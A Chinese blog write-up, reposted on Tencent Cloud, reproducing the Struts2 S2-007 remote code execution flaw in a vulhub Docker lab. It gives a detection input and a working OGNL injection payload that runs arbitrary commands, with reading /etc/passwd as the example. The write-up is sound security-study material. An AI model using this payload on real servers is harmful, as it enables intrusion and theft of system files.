前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >S2-007远程代码执行复现

S2-007远程代码执行复现

作者头像
LuckySec
发布2022-11-02 14:08:34
5100
发布2022-11-02 14:08:34
举报
文章被收录于专栏:LuckySec网络安全LuckySec网络安全

0x01 漏洞简介

S2-007漏洞一般出现在表单处。当配置了验证规则 <ActionName>-validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

  • 影响版本Struts 2.0.0-2.2.3

0x02 靶场搭建

使用vulhub复现漏洞环境相当方便,Giuhub上下载漏洞环境太慢,建议去码云上下载。

代码语言:javascript
复制
cd vulhub/struts2/s2-007
docker-compose build
docker-compose up -d

0x03 漏洞检测

在年龄age框中输入非数字类型值点击登陆

代码语言:javascript
复制
'+(1+1)+'

年龄age框的值变成 11,证明漏洞存在。

0x04 漏洞利用

直接在年龄age框输入输入要执行的任意代码的EXP,点击登陆提交,页面会返回响应的执行结果。

执行任意命令EXP:

代码语言:javascript
复制
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

找到EXP中的exec('id')值,将id改为你想要执行的命令即可,例如:exec('cat /etc/passwd')

如果执行结果返回的内容太多,可以通过查看网页源代码进行查看。

参考文章

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-08-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 漏洞简介
  • 0x02 靶场搭建
  • 0x03 漏洞检测
  • 0x04 漏洞利用
  • 参考文章
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档